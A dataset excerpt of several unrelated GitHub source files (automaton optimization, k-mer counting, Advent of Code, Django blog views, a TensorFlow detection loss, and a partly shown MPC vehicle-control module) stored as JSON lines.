error\"\"\"\n return error.to_dict(), getattr(error, 'code', 500)\n\ndef make_error(status,field,code,message,success):\n response = jsonify({\n 'status': status,\n 'code': code,\n 'message': field,\n 'error': message,\n 'success' : success\n })\n return response\n\n\n\n\n\n\n\n","repo_name":"deekshaaneja/fintech_product_xa","sub_path":"BaseError.py","file_name":"BaseError.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"39112370747","text":"###################################################################\n# Barbora Šmahlíková\n# 2020/2021\n# Optimizations for Büchi automata\n###################################################################\n\nfrom automaton import Automaton\nfrom intersection import *\nfrom direct import reduction\nimport atomic_automata\n\ndef tarjan(a):\n \"\"\"Tarjan's algorithm.\"\"\"\n \n index=0\n stack=[] # empty stack\n visited={i : [-1,-1,False] for i in a.states} # state : [index,lowlink,onStack]\n all_components=list()\n\n def scc(v):\n \"\"\"Inner functions to find strongly connected components\"\"\"\n\n nonlocal index\n\n # Set the depth index for v to the smallest unused index\n visited[v][0]=index\n visited[v][1]=index\n index+=1\n stack.append(v)\n visited[v][2]=True\n\n # Successors of v\n for w in a.states:\n if any(t[2]==w and t[0]==v for t in a.transitions):\n if visited[w][0]==-1:\n # Successor w has not yet been visited -> recursion\n scc(w)\n visited[v][1]=min(visited[v][1],visited[w][1])\n \n elif visited[w][2]:\n # Successor w is on stack and hence in the current SCC\n # If w is not on stack, then (v,w) is a transition pointing to an SCC already found and must be ignored\n visited[v][1]=min(visited[v][1],visited[w][0])\n \n # If v is a root state, pop the stack and generate a SCC\n if visited[v][1]==visited[v][0]:\n # Start a new strongly connected component\n component=set()\n w=stack.pop()\n\n while w!=v:\n visited[w][2]=False\n # Add w to current scc\n component.add(w)\n w=stack.pop()\n \n visited[w][2]=False\n component.add(w)\n all_components.append(component)\n\n for v in visited:\n if visited[v][0] == -1:\n scc(v)\n\n return all_components\n\ndef remove_useless_scc(a):\n \"\"\"Removes useless strongly connected components - components from which we can't reach to any other scc \n and no state in scc is accepting or components containing only one accepting state with no transition from it.\"\"\"\n\n components=tarjan(a)\n empty = empty_language(a, components)\n if empty:\n a = atomic_automata.false()\n return True # empty language\n\n change=True\n while change:\n change=False\n for c in components:\n remove=True\n \n # Components from which it can't be reached to any other scc and where no state is accepting or \n # it contains only one state which is accepting\n if (not any(state in a.accept for state in c)) or (len(c)==1 and all(state in a.accept for state in c)):\n for state in c:\n if any((t[0]==state and t[2] not in c) for t in a.transitions):\n remove=False\n if len(c)==1 and state in a.accept and any((t[0]==state and t[2]==state) for t in a.transitions):\n remove=False\n \n # Remove whole component\n if remove:\n change=True\n for state in c:\n if state not in a.start:\n a.states.remove(state)\n if state in a.start:\n a.start.remove(state)\n if state in a.accept:\n a.accept.remove(state)\n transitions=copy(a.transitions)\n for t in transitions:\n if t[0]==state or t[2]==state:\n a.transitions.remove(t)\n 
components.remove(c)\n \n return False # non-empty language\n\ndef empty_language(a, components):\n \"\"\"Testing language emptiness\"\"\"\n\n empty = True\n for component in components:\n if any(state in a.accept for state in component):\n if len(component)==1:\n for state in component:\n if any(t[0]==t[2] and t[0]==state for t in a.transitions):\n empty = False\n return empty\n else:\n empty = False\n return empty\n return empty\n\ndef find_and_change_cycles(a):\n \"\"\"Finds double cycles and reduces them if possible.\"\"\"\n\n accept2=set()\n end=False\n while not end:\n end=True\n for q in a.accept:\n \n # Every accept state has list [[[visited_states],[inputs]]]\n # Every possible path from q is in visited1\n visited1=[[[q], list()]]\n for v in visited1:\n # Visited state is the corresponding state in the 2nd copy or such a state doesn't exist\n if (v[0][0]==q[0] and v[0][1]==q[1] and v[0][2]!=q[2]) or (q[0],q[1],2) not in a.states:\n break\n \n seen_states=list() # All states seen on the path\n for t in a.transitions:\n # All transitions from the last visited state\n if t[0]==v[0][-1]:\n seen_states=copy(v[0])\n seen_states.append(t[2])\n new=copy([copy(seen_states), copy(v[1])]) # Add one new state that can be visited\n # Add this state only if it wasn't visited before\n if all(new[0][-1]!=u[0][-1] for u in visited1):\n new[1].append(t[1])\n visited1.append(new)\n\n visited2=list() # Visited states on the way back\n for v in visited1:\n # Last visited state was the corresponding one in the 2nd copy\n if v[0][-1][0]==q[0] and v[0][-1][1]==q[1] and v[0][-1][2]!=q[2]:\n visited2=[copy(v)]\n new_state=[copy(v[0][-1])] \n new_state2=list()\n new_list=copy(v[1])\n \n for i in v[1]: # for every input symbol\n first=True\n for t in a.transitions:\n if t[0] in new_state and t[1]==i:\n if first:\n new_list.remove(i) # remove input symbol\n first=False\n new=copy([copy(t[2]), copy(new_list)])\n visited2.append(new) \n new_state2.append(t[2]) \n \n # Cycle was found\n if len(new[1])==0 and new[0]==v[0][0]: \n # Cycle new[0]->v[0][-1]->new[0] for input 2*v[1]\n end=False\n # Add the corresponding state in the 2nd copy to accepting states\n accept2.add(v[0][-1]) \n for t2 in a.transitions:\n if t2[2][0]==v[0][0][0] and t2[2][1]==v[0][0][1] and ((t2[0][0],t2[0][1],1) in v[0][:-1] or (t2[0][0],t2[0][1],2) in v[0][:-1]):\n # Replace the arrow to the other copy\n t2[2]=list(t2[2])\n t2[2][2]=(t2[2][2])%2+1\n t2[2]=tuple(t2[2])\n new_state=copy(new_state2)\n\n # add new accept states\n for q in accept2:\n a.accept.add(q)\n \n # remove old accept states\n accept2=copy(a.accept)\n for q in a.accept:\n if q not in a.states and q not in accept2:\n accept2.remove(q)\n a.accept=copy(accept2)\n \n return a\n\n\ndef remove_unreachable_parts(a):\n \"\"\"Removes unreachable parts of an automaton.\"\"\"\n\n # Find all reachable states\n reachable=list()\n for st in a.start:\n reachable.append(st)\n \n quit=False\n while not quit:\n quit=True\n for t3 in a.transitions:\n if t3[0] in reachable and t3[2] not in reachable:\n reachable.append(t3[2])\n quit=False\n \n # Remove useless transitions\n transitions2=copy(a.transitions)\n for t in a.transitions:\n if t[0] not in reachable or t[2] not in reachable:\n transitions2.remove(t)\n a.transitions=copy(transitions2)\n \n # Remove unreachable states\n states=copy(a.states)\n for s in states:\n if s not in reachable:\n a.states.remove(s)\n \n # Remove unreachable accept states\n accept2=copy(a.accept)\n for i in a.accept:\n if i not in a.states:\n accept2.remove(i)\n 
elif (not any(t[0]==i or t[2]==i for t in a.transitions)):\n accept2.remove(i)\n elif not any(t[2]==i for t in a.transitions):\n accept2.remove(i)\n a.accept=copy(accept2)\n \n return a\n\ndef optimize(a):\n edit_names(a)\n a=remove_unreachable_parts(a)\n empty = remove_useless_scc(a)\n if empty:\n # empty language\n a = atomic_automata.false()\n return True \n\n reduction(a)\n a=remove_unreachable_parts(a)\n edit_names(a)\n edit_transitions(a)\n return False","repo_name":"barbora4/projektova-praxe","sub_path":"optimize.py","file_name":"optimize.py","file_ext":"py","file_size_in_byte":9565,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"4806943266","text":"#!/usr/bin/env python3\n\n\"\"\"Count all kmers in a FASTA file \"\"\"\n\n\n\nfrom fasta import FASTAReader \nimport sys\n\nreader1 = FASTAReader(open( sys.argv[1])) #SUBSET/TARGET\nreader2 = FASTAReader(open( sys.argv[2])) #QUERY/YAK\nk = int( sys.argv[3] ) #K\n\nkmer_positions = dict()\ntarget_seq_d = {}\nextension_list = {}\n\nfor ident, sequence in reader1:\n sequence = sequence.upper()\n target_seq_d[ident] = sequence\n \n for i in range( 0, len(sequence)-k+1 ):\n kmer = sequence[i:i+k]\n if kmer in kmer_positions:\n kmer_positions[kmer].append((ident,i))\n else:\n kmer_positions[kmer] = [(ident,i)]\n \nfor ident, sequence in reader2:\n sequence = sequence.upper()\n for j in range( 0, len(sequence)-k+1 ):\n kmer = sequence[j:j+k]\n if kmer in kmer_positions:\n value = kmer_positions[kmer]\n for ident,i in value:\n \n target_seq = target_seq_d[ident]\n length_target = len(target_seq)\n length_query = len(sequence)\n extend_right = True\n extended_kmer = kmer \n i = 0\n j = 0\n while True:\n if extend_right:\n if sequence[k+j+1] == target_seq[k+i+1]:\n i += 1\n j += 1\n extended_kmer += sequence[k+j+1]\n else:\n extend_right = False \n extension_list[extended_kmer] = target_seq \n else:\n break\n if i+k == length_target or j+k == length_query :\n extend_right = False\n break\nsorted(extended_kmer, reverse = True, key = len) \nfor extended_kmer in extension_list:\n print(extended_kmer) \n \n \n \n \n \n","repo_name":"bersabel/qbb2019-answers","sub_path":"day3-homework/day3-homework-finish.py","file_name":"day3-homework-finish.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14379676842","text":"def existsSumInArray(valueToCompare, values):\n\tfor firstValue in values :\n\t\tfor secondValue in values :\n\t\t\tif firstValue != secondValue and (firstValue + secondValue) == valueToCompare:\n\t\t\t\treturn True;\n\treturn False;\n\ndef sumContiguous(valueToCompare, values):\n\tsetNumbers = []\n\tsumValue = 0;\n\tfor firstValue in values :\n\t\tsumValue = sumValue + firstValue\n\t\tsetNumbers.append(firstValue)\n\t\tif sumValue == valueToCompare :\n\t\t\t\treturn (True,setNumbers)\n\t\n\treturn (False, []);\n\t\t\t\t\n\nf = open(\"advento2020/day9/input.txt\", \"r\")\nlines = f.readlines()\n\nxmasNumbers = []\nnotValidNumbers = []\npreamble = 25\nfor current in lines:\n\tparsedValue = int(current.strip())\n\tif len(xmasNumbers) >= (preamble + 1) and not existsSumInArray(parsedValue,xmasNumbers[len(xmasNumbers)-(preamble + 1):len(xmasNumbers)]):\n\t\tnotValidNumbers.append(parsedValue)\n\t\n\txmasNumbers.append(parsedValue)\t\n\t\t\nprint(notValidNumbers)\n\nvalueToCompare = notValidNumbers[0]\n\nindex = 0;\nresult = {}\nwhile index < len(xmasNumbers) :\n\tresult = 
sumContiguous(valueToCompare,xmasNumbers[index:len(xmasNumbers)])\n\tindex = index +1\n\n\tif result[0] :\n\t\tprint(sorted(result[1]))\n\t\tbreak;\n\nsortedList = sorted(result[1])\nprint (f\"{sortedList[0]} + {sortedList[len(sortedList)-1]} = {sortedList[0] + sortedList[len(sortedList)-1]}\" )","repo_name":"bmvmachado/advento2020","sub_path":"day9/exercise2/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3559918495","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function, absolute_import\n\nfrom datetime import datetime\n#from django.http import Http404, HttpResponse\n#from django.shortcuts import render_to_response, render, redirect, \\\n# get_object_or_404, get_list_or_404\nfrom django.conf import settings\nfrom django.views import generic\nfrom django.http import Http404\nfrom django.core import validators\nfrom ..utils.pagination import get_pagination\nfrom .models import Article, ArticleTag, Category, Tag\n\nvalidator_url = validators.URLValidator()\n\n\nclass BlogTemlateView(generic.TemplateView):\n def _get_categories(self):\n return {'categories': Category.objects.all()}\n\n def _classify_by_date(self):\n r = {}\n articles = Article.vobjects.all()\n for obj in articles:\n year = obj.created.year\n month = obj.created.month\n r.setdefault(year, [])\n if month not in r[year]:\n r[year].append(month)\n return {'dates': r}\n\n def _get_tags(self):\n return {'tags': Tag.objects.all()}\n\n def _get_lastest_articles(self):\n return {\"lastest_articles\": Article.vobjects.order_by('-created')[:10]}\n\n def _get_click_articles(self):\n return {\"click_articles\": Article.vobjects.order_by('-clicks')[:10]}\n\n def get_paginator(self, queryset):\n return get_pagination(queryset, self.request.REQUEST.get(\"page\"))\n\n def get_context_data(self, *args, **kwargs):\n kwargs.update(self._get_categories())\n kwargs.update(self._get_tags())\n kwargs.update(self._classify_by_date())\n kwargs.update(self._get_lastest_articles())\n kwargs.update(self._get_click_articles())\n return super(BlogTemlateView, self).get_context_data(**kwargs)\n\n\nclass IndexView(BlogTemlateView):\n template_name = 'blog/index.html'\n\n def get_context_data(self, **kwargs):\n queryset = Article.vobjects.all()\n kwargs.update(self.get_paginator(queryset))\n return super(IndexView, self).get_context_data(**kwargs)\n\n\nclass CategoryView(BlogTemlateView):\n template_name = \"blog/category.html\"\n\n def get_context_data(self, **kwargs):\n queryset = Article.vobjects.filter(category_id=self.kwargs['pk'])\n kwargs.update(self.get_paginator(queryset))\n return super(CategoryView, self).get_context_data(**kwargs)\n\n\nclass YearView(BlogTemlateView):\n template_name = 'blog/year.html'\n\n def get_context_data(self, **kwargs):\n year = int(self.kwargs['year'].strip())\n start = datetime(year, 1, 1)\n end = datetime(year + 1, 1, 1)\n queryset = Article.vobjects.filter(created__gte=start).filter(created__lt=end)\n kwargs.update(self.get_paginator(queryset))\n return super(YearView, self).get_context_data(**kwargs)\n\n\nclass MonthView(BlogTemlateView):\n template_name = 'blog/month.html'\n\n def get_context_data(self, **kwargs):\n year = int(self.kwargs['year'].strip())\n month = int(self.kwargs['month'].strip())\n start = datetime(year, month, 1)\n if month < 1 or month > 12:\n raise Http404()\n elif month == 12:\n end = datetime(year + 1, 1, 1)\n else:\n end = 
datetime(year, month + 1, 1)\n queryset = Article.vobjects.filter(created__gte=start).filter(created__lt=end)\n kwargs.update(self.get_paginator(queryset))\n return super(YearView, self).get_context_data(**kwargs)\n\n\nclass TagView(BlogTemlateView):\n template_name = 'blog/tag.html'\n\n def get_context_data(self, **kwargs):\n article_tag_list = ArticleTag.objects.filter(tag_id=self.kwargs['tag_id'])\n queryset = []\n for i in article_tag_list:\n queryset.append(i.article_id)\n kwargs.update(self.get_paginator(queryset))\n return super(TagView, self).get_context_data(**kwargs)\n\n\nclass ArticleView(BlogTemlateView):\n template_name = 'blog/article.html'\n\n def get_context_data(self, **kwargs):\n try:\n article = Article.vobjects.filter(id=self.kwargs['id'])[0]\n except:\n raise Http404()\n article.click_once()\n kwargs['object'] = article\n kwargs['duoshuo'] = settings.DUOSHUO_SHORT_NAME\n return super(ArticleView, self).get_context_data(**kwargs)\n","repo_name":"snowflying/homepage","sub_path":"homepage/homepage/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8565287527","text":"import logging\n\nimport tensorflow as tf\n\nimport anchors\n\nlogger = logging.getLogger('detection')\n\ndef focal_loss(y_true: tf.Tensor,\n y_pred: tf.Tensor,\n gamma: float = 1.5,\n alpha: float = 0.25,\n from_logits: bool = False,\n reduction: str = 'sum'):\n\n y_true = tf.cast(y_true, tf.float32)\n y_pred = tf.cast(y_pred, tf.float32)\n\n if from_logits:\n y_pred = tf.nn.softmax(y_pred)\n\n epsilon = 1e-6\n y_pred = tf.clip_by_value(y_pred, epsilon, 1. - epsilon)\n\n alpha = tf.ones_like(y_true) * alpha\n alpha = tf.where(tf.equal(y_true, 1.), alpha, 1 - alpha)\n\n pt = tf.where(tf.equal(y_true, 1.), y_pred, 1 - y_pred)\n\n loss = -alpha * tf.pow(1. 
- pt, gamma) * tf.math.log(pt)\n loss = tf.reduce_sum(loss, axis=-1)\n\n if reduction == 'mean':\n return tf.reduce_mean(loss)\n elif reduction == 'sum':\n return tf.reduce_sum(loss)\n\n return loss\n\nclass Metric:\n def __init__(self, training=True, **kwargs):\n self.training = training\n\n self.total_loss = tf.keras.metrics.Mean()\n self.reg_loss = tf.keras.metrics.Mean()\n self.dist_loss = tf.keras.metrics.Mean()\n self.ce_loss = tf.keras.metrics.Mean()\n self.ce_image_loss = tf.keras.metrics.Mean()\n\n self.ce_acc = tf.keras.metrics.CategoricalAccuracy()\n self.ce_image_acc = tf.keras.metrics.CategoricalAccuracy()\n\n def reset_states(self):\n self.total_loss.reset_states()\n self.reg_loss.reset_states()\n self.dist_loss.reset_states()\n self.ce_loss.reset_states()\n self.ce_image_loss.reset_states()\n\n self.ce_acc.reset_states()\n self.ce_image_acc.reset_states()\n\n def str_result(self):\n return 'total_loss: {:.4f}, reg_loss: {:.3f}, dist: {:.3f}, ce: {:.3f}, image_ce: {:.3f}, acc: {:.3f}, image_acc: {:.3f}'.format(\n self.total_loss.result(),\n self.reg_loss.result(),\n self.dist_loss.result(),\n self.ce_loss.result(),\n self.ce_image_loss.result(),\n\n self.ce_acc.result(),\n self.ce_image_acc.result(),\n )\n\n\nclass ModelMetric:\n def __init__(self,\n all_anchors: tf.Tensor,\n num_classes: int,\n dtype: tf.dtypes.DType = tf.float32,\n **kwargs):\n\n self.all_anchors = all_anchors\n self.num_classes = num_classes\n self.dtype = dtype\n\n self.train_metric = Metric(training=True, name='train_metric')\n\n self.dist_loss = tf.keras.losses.Huber(reduction=tf.keras.losses.Reduction.SUM)\n\n def str_result(self, training):\n return self.train_metric.str_result()\n\n def reset_states(self):\n self.train_metric.reset_states()\n\n def __call__(self, images, true_bboxes, true_labels, true_image_labels, pred_bboxes, pred_scores, pred_image_scores, training):\n true_bboxes, true_labels = anchors.anchor_targets_bbox(self.all_anchors, images, true_bboxes, true_labels, self.num_classes, dtype=self.dtype)\n\n y_shape = tf.shape(true_labels)\n batch = y_shape[0]\n n_anchors = y_shape[1]\n\n anchors_states = true_labels[:, :, -1]\n not_ignore_idx = tf.where(tf.not_equal(anchors_states, -1.))\n true_idx = tf.where(tf.equal(anchors_states, 1.))\n\n normalizer = tf.shape(true_idx)[0]\n normalizer = tf.cast(normalizer, tf.float32)\n\n true_not_ignore_labels = tf.gather_nd(true_labels[:, :, :-1], not_ignore_idx)\n pred_not_ignore_scores = tf.gather_nd(pred_scores, not_ignore_idx)\n\n true_bboxes = tf.gather_nd(true_bboxes[:, :, :-1], true_idx)\n pred_bboxes = tf.gather_nd(pred_bboxes, true_idx)\n\n dist_loss = self.dist_loss(true_bboxes, pred_bboxes)\n class_loss = focal_loss(true_not_ignore_labels, pred_not_ignore_scores, reduction='sum')\n\n # normalizer equals zero when there are no bboxes and there are only image classes\n if normalizer != 0:\n dist_loss = tf.divide(dist_loss, normalizer)\n class_loss = tf.divide(class_loss, normalizer)\n\n self.train_metric.dist_loss.update_state(dist_loss)\n self.train_metric.ce_loss.update_state(class_loss)\n\n true_fg_labels = tf.gather_nd(true_labels[:, :, :-1], true_idx)\n pred_fg_scores = tf.gather_nd(pred_scores, true_idx)\n self.train_metric.ce_acc.update_state(true_fg_labels, pred_fg_scores)\n\n image_class_loss = 0.\n if pred_image_scores is not None:\n image_class_loss = focal_loss(true_image_labels, pred_image_scores, reduction='sum')\n self.train_metric.ce_image_loss.update_state(image_class_loss)\n 
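For cross-checking the TensorFlow implementation above on small arrays, a NumPy reference with the same defaults (`gamma=1.5`, `alpha=0.25`) can be handy. This is a sketch of the same per-element alpha-balanced focal term, summed over the last axis:

```python
import numpy as np

# NumPy mirror of focal_loss above (sketch): down-weights easy examples via
# the (1 - pt)**gamma factor and balances classes with alpha.
def focal_loss_np(y_true, y_pred, gamma=1.5, alpha=0.25, eps=1e-6):
    y_pred = np.clip(y_pred, eps, 1.0 - eps)
    a = np.where(y_true == 1.0, alpha, 1.0 - alpha)
    pt = np.where(y_true == 1.0, y_pred, 1.0 - y_pred)
    return np.sum(-a * (1.0 - pt) ** gamma * np.log(pt), axis=-1)
```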
self.train_metric.ce_image_acc.update_state(true_image_labels, pred_image_scores)\n\n return dist_loss, class_loss, image_class_loss\n","repo_name":"bioothod/object_detection","sub_path":"metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":4889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34034678282","text":"import numpy as np\nfrom casadi import *\nimport math\nimport time\n# from data_module import data\nimport matplotlib.pyplot as plt\n\n# 车的长与宽\nL, W = 4.8, 2.0\n\n\n# 决策模块:\nclass Decision(object):\n def __init__(self):\n # 调用 Processor()类\n self.Processor = Processor()\n # 调用 ModelPredictiveControl()类\n self.MPC = ModelPredictiveControl()\n\n # 输入初始状态以及参考路径,输出MPC解\n def update(self, init_states, ref_path):\n\n # self.Processor.nav_data = self.data.get_navigation(id=0)\n # self.Processor.sensor_data = dict(ego_data=self.data.get_navigation(id=0),\n # sur_data=self.data.get_traffic(id=0))\n # self.Processor.nav_data = nav_data\n # self.Processor.sensor_data = sensor_data\n # trajs = self.Processor.get_trajs()\n # init_states = self.Processor.get_nearest_vehs()\n\n # 生成大小为(1,86)的列表,元素都是0 :[0 , 0, ...,0]\n X0 = np.zeros(86).tolist()\n # 调用类中的求解函数得到结果\n return self.MPC.mpc_solver(init_states, X0, ref_path)\n\n # info = {'index': {'action': action, 'cost': cost, 'dd': deaddistance}}\n\n\n# 车辆模型类:存储车辆参数 + 离散系统下的车辆状态转移方程\nclass VehicleDynamics(object):\n def __init__(self, ):\n\n # 生成一个字典:用于调用车辆参数\n self.vehicle_params = dict(C_f=-128915.5, # front wheel cornering stiffness [N/rad]\n C_r=-85943.6, # rear wheel cornering stiffness [N/rad]\n a=1.06, # distance from CG to front axle [m]\n b=1.85, # distance from CG to rear axle [m]\n mass=1412., # mass [kg]\n I_z=1536.7, # Polar moment of inertia at CG [kg*m^2]\n miu=1.0, # tire-road friction coefficient\n g=9.81, # acceleration of gravity [m/s^2]\n )\n\n # 在vehicle_params字典中,按照 key 获取 value,物理意义依次是: 质心到前轴距离、质心到后轴距离、整车质量、重力加速度\n a, b, mass, g = self.vehicle_params['a'], self.vehicle_params['b'], \\\n self.vehicle_params['mass'], self.vehicle_params['g']\n\n # 分别计算前后轴的垂向载荷\n F_zf, F_zr = b * mass * g / (a + b), a * mass * g / (a + b)\n\n # 将前后轴载荷计算结果添加到vehicle_params字典中\n self.vehicle_params.update(dict(F_zf=F_zf,\n F_zr=F_zr))\n\n # 离散系统下,车辆的状态转移方程,简而言之:x(t+1) = f(x_t,u_t,dt)\n def f_xu(self, x, u, tau):\n\n # 车辆状态,依次是:[纵向速度、横向速度、横摆角速度、 纵向坐标、横向坐标、航向角]\n v_x, v_y, r, x, y, phi = x[0], x[1], x[2], x[3], x[4], x[5]\n # 角度转弧度: °--->rad\n phi = phi * np.pi / 180.\n # 控制量依次是:[车轮转角,纵向加速度]\n steer, a_x = u[0], u[1]\n # 从vehicle_params字典中提取参数,依次是:[前轮侧偏刚度、后轮侧偏刚度、质心到前轴距离、质心到后轴距离、整车质量、绕z轴的转动惯量、胎-陆摩擦系数、重力加速度]\n C_f = self.vehicle_params['C_f']\n C_r = self.vehicle_params['C_r']\n a = self.vehicle_params['a']\n b = self.vehicle_params['b']\n mass = self.vehicle_params['mass']\n I_z = self.vehicle_params['I_z']\n miu = self.vehicle_params['miu']\n g = self.vehicle_params['g']\n # 利用模型计算下一时刻车辆状态:x(t+1) = f(x_t,u_t,dt)\n next_state = [v_x + tau * (a_x + v_y * r),\n (mass * v_y * v_x + tau * (\n a * C_f - b * C_r) * r - tau * C_f * steer * v_x - tau * mass * power(\n v_x, 2) * r) / (mass * v_x - tau * (C_f + C_r)),\n (-I_z * r * v_x - tau * (a * C_f - b * C_r) * v_y + tau * a * C_f * steer * v_x) / (\n tau * (power(a, 2) * C_f + power(b, 2) * C_r) - I_z * v_x),\n x + tau * (v_x * cos(phi) - v_y * sin(phi)),\n y + tau * (v_x * sin(phi) + v_y * cos(phi)),\n (phi + tau * r) * 180 / np.pi]\n # 返回下一时刻车辆状态\n return next_state\n\n\n\n# 该类功能:周车状态预测 + 构造自车与周车约束\nclass 
Dynamics(object):\n\n # 输入初始状态、离散时间间隔、单车的状态维数\n def __init__(self, x_init, tau, per_veh_info_dim=4):\n\n # 初始化:将输入依次存储\n self.x_init = x_init\n self.tau = tau\n self.per_veh_info_dim = per_veh_info_dim\n # 调用车辆模型类:VehicleDynamics()\n self.vd = VehicleDynamics()\n # 存储x_init[6:] todo: 需要明确 x_init[6:]是什么,猜测是四辆周车的信息,每辆车状态是四维\n self.vehs = x_init[6:]\n\n # 递推四辆周车状态并更新self.vehs\n def vehs_pred(self):\n vehs_pred = []\n # 遍历,调用sur_veh_predict 函数递推四辆周车状态并更新\n for vehs_index in range(4):\n vehs_pred += \\\n self.sur_veh_predict(\n self.vehs[vehs_index * self.per_veh_info_dim : (vehs_index + 1) * self.per_veh_info_dim])\n\n # 递推四辆周车状态并更新self.vehs\n self.vehs = vehs_pred\n\n # 周车的状态预测\n def sur_veh_predict(self, vehs):\n # 大地坐标系下,周车 横向位置、纵向位置、速度、航向角\n veh_x, veh_y, veh_v, veh_phi = vehs[0], vehs[1], vehs[2], vehs[3]\n # ° ---> rad\n veh_phis_rad = veh_phi * np.pi / 180.\n # 离散时间内,大地坐标系下周车横纵向位移\n veh_x_delta = veh_v * self.tau * math.cos(veh_phis_rad)\n veh_y_delta = veh_v * self.tau * math.sin(veh_phis_rad)\n # 默认预测期间,周车航向角不变\n veh_phi_rad_delta = 0\n # veh_phi_rad_delta = veh_r * self.tau # TODO: 确认是否可以获得角速度来进行估计\n # 计算周车下一时刻状态\n next_veh_x, next_veh_y, next_veh_v, next_veh_phi_rad = \\\n veh_x + veh_x_delta, veh_y + veh_y_delta, veh_v, veh_phis_rad + veh_phi_rad_delta\n # rad ---> °\n next_veh_phi = next_veh_phi_rad * 180 / np.pi\n # 航向角约束在[-180°,+180°]\n next_veh_phi = deal_with_phi(next_veh_phi)\n # 返回周车一步预测状态 [横向位置、纵向位置、速度、航向角]\n return [next_veh_x, next_veh_y, next_veh_v, next_veh_phi]\n\n # 调用车辆模型类 VehicleDynamics:完成一步自车状态预测\n def ego_veh_predict(self, x, u):\n next_ego = self.vd.f_xu(x, u, self.tau) # Unit of heading angle is degree\n return next_ego\n\n # 构造自车与周车约束\n def construct_sur_constraints(self, x):\n # 自车 横向坐标、纵向坐标、航向角\n ego_x, ego_y, ego_phi = x[3], x[4], x[5]\n # 约束集合\n g_list = []\n # 自车 (长-宽)/2\n ego_lws = (L - W) / 2. # TODO:自车长宽的设定由自车信息引入,考虑在x_init引入\n # 自车前轴的横纵坐标\n ego_front_points = ego_x + ego_lws * cos(ego_phi * np.pi / 180.), \\\n ego_y + ego_lws * sin(ego_phi * np.pi / 180.)\n # 自车后轴的横纵坐标\n ego_rear_points = ego_x - ego_lws * cos(ego_phi * np.pi / 180.), \\\n ego_y - ego_lws * sin(ego_phi * np.pi / 180.)\n\n # 实质是添加约束:遍历周车,使之不与自车碰撞\n for vehs_index in range(4):\n # 遍历周车\n veh = self.vehs[vehs_index * self.per_veh_info_dim:(vehs_index + 1) * self.per_veh_info_dim]\n # 获取周车横纵向位置与航向角\n veh_x, veh_y, veh_phi = veh[0], veh[1], veh[3]\n # 本意应该是周车的 (长-宽)/2\n veh_lws = (L - W) / 2. 
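The collision constraints assembled here approximate every vehicle by two discs centred on points offset ahead of and behind its centre, so a pair of vehicles contributes four point-to-point distances. A plain-NumPy sketch of the same geometry (`min_clearance` is a hypothetical helper taking `(x, y, phi_deg)` triples; the CasADi code above emits each of the four distances, minus the margin, as its own constraint rather than taking a minimum):

```python
import numpy as np

# Two-disc footprint test (sketch). Each vehicle is reduced to two points
# offset (L - W) / 2 ahead of and behind its centre along the heading.
def min_clearance(ego, veh, L=4.8, W=2.0, margin=3.5):
    def points(x, y, phi_deg):
        lw = (L - W) / 2.0
        phi = np.radians(phi_deg)
        offset = lw * np.array([np.cos(phi), np.sin(phi)])
        centre = np.array([x, y])
        return centre + offset, centre - offset

    # > 0 means all four pairwise constraints are satisfied
    return min(np.linalg.norm(p - q) - margin
               for p in points(*ego) for q in points(*veh))
```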
# TODO:周车的长宽引入变量,L = veh[4], W = veh[5], 同时在x_init引入\n # 周车前轴的横纵坐标\n veh_front_points = veh_x + veh_lws * math.cos(veh_phi * np.pi / 180.), \\\n veh_y + veh_lws * math.sin(veh_phi * np.pi / 180.)\n # 周车后轴的横纵坐标\n veh_rear_points = veh_x - veh_lws * math.cos(veh_phi * np.pi / 180.), \\\n veh_y - veh_lws * math.sin(veh_phi * np.pi / 180.)\n # 计算自车前轴坐标点与每辆周车前后轴坐标点的距离,自车后轴坐标点与每辆周车前后轴坐标点的距离:共 2*2*4 =16 个约束,注意约束的添加顺序是一辆一辆算周车的\n # 遍历自车前后轴坐标点\n for ego_point in [ego_front_points, ego_rear_points]:\n # 遍历周车前后轴坐标点\n for veh_point in [veh_front_points, veh_rear_points]:\n # 绝对距离计算 - 3.5 : 猜测3.5是安全距离,单位m\n veh2veh_dist = sqrt(power(ego_point[0] - veh_point[0], 2) + power(ego_point[1] - veh_point[1], 2)) - 3.5\n # 添加约束\n g_list.append(veh2veh_dist)\n # 返回自车与周车约束\n return g_list\n\n\n\n# 模型预测控制,需要调用casadi实现\nclass ModelPredictiveControl(object):\n # 初始化:预测时域、频率(倒数为离散时间)、期望速度、自车状态维数、动作维数、None、求解器字典\n def __init__(self, horizon=10):\n self.horizon = horizon\n self.base_frequency = 10.\n self.exp_v = 10.\n self.STATE_DIM = 6 # ego_info\n self.ACTION_DIM = 2\n self.dynamics = None\n self._sol_dic = {'ipopt.print_level': 0,\n 'ipopt.sb': 'yes',\n 'print_time': 0}\n\n # mpc求解器:输出初始状态、XO、参考路径\n def mpc_solver(self, x_init, XO, ref_path):\n # 调用 Dynamics 类\n self.dynamics = Dynamics(x_init, 1 / self.base_frequency)\n # casadi框架下: 声明变量x,u\n x = SX.sym('x', self.STATE_DIM)\n u = SX.sym('u', self.ACTION_DIM)\n # casadi框架下声明向量f: 将\"x\" \"u\"作为输入,调用ego_veh_predict函数,得到输出, 将输出用casadi框架下的vertcat表示\n f = vertcat(*self.dynamics.ego_veh_predict(x, u))\n # casadi框架下创建一个函数,命名为F : 描述casadi框架下变量 “x” “u” 与 “f” 的关系(通过x,u构造f)\n F = Function(\"F\", [x, u], [f]) # ego predict model\n\n # 创建用于优化非线性问题的空列表\n # Create empty NLP\n # 优化目标/对象\n w = [] # variables to optimize\n # 状态与动作约束条件的下界\n lbw = [] # lower bound for state and action constraints\n 